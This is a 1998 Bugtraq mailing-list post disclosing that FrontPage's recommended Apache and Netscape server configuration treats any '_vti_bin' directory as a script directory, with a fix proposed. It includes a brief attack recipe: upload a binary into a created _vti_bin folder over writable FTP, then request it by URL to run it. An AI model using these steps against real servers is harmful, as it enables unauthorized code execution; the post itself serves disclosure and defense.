[6588] in bugtraq
Another Frontpage Bug, with promiscuous ScriptAliases
daemon@ATHENA.MIT.EDU (pedward@WEBCOM.COM)
Thu Apr 23 22:37:30 1998
Date: Thu, 23 Apr 1998 18:35:34 -0700
Reply-To: pedward@WEBCOM.COM
From: pedward@WEBCOM.COM
To: BUGTRAQ@NETSPACE.ORG
The Apache hack that M$ distributes allows one to create ANY directory
on a Frontpage enabled web server, and execute content in it.
This also goes for the stock Netscape Server config that M$ recommends.
Hmm, I wonder if M$ deliberately places security holes in Unix apps so
that they can claim "but Frontpage under IIS doesn't have that hole!".
Mainly because IIS loads Frontpage as a DLL (I suppose). Frontpage
wouldn't be anywhere near the PIG it is if it ran as an Apache module
or NSAPI module...but then who has an extra 5 megs per server process
to burn???
EG:
You want a rogue program to run, and the victim has anonymous uploadable
FTP (or you sign up for a service and you want to run binaries on the
server, but can't):
mkdir _vti_bin
cd _vti_bin
put [whatever bin]
Web browser:
http://www.victim.com/somedirectorystructure/_vti_bin/trojanfile
Boom you've got stuff runnin on that server.
They configure the Netscape server the same way.
Unless you make a special NSAPI or Apache module, you're vulnerable
as a freshly born ewe of a cloned sheep named Dolly!
And why is this possible???
ScriptAlias "*/_vti_bin/*" /somedirpath
<Object ppath="*/_vti_bin/*">
...
</Object>
Solution:
Custom NSAPI / Apache module:
NameTrans fn="prefix_fpdir" prefix_path="/somedir/cgi-bin/frontpage" name="cgi"
Plus:
Custom Stub:
/somedir/cgi-bin/frontpage/cgi-wrapper [path to real binary]
--Perry
--
Perry Harrington System Software Engineer zelur xuniL ()
http://www.webcom.com perry.harrington@webcom.com Think Blue. /\
